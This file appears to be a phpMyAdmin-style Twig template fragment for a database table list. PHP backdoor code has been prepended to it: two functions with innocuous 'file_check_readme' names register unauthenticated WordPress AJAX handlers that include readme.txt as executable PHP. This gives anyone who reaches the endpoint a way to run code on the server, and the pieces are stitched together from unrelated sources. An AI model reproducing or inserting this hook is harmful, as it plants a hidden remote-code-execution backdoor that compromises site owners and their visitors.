if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
<div class='list_container hide'> <ul{{ has_search_results ? ' class="search_results"' }}> {{ list_content|raw }} </ul> {% if not is_tree %} <span class='hide loaded_db'>{{ parent_name|url_encode }}</span> {% if list_content is empty %} <div>{% trans 'No tables found in database.' %}</div> {% endif %} {% endif %} </div>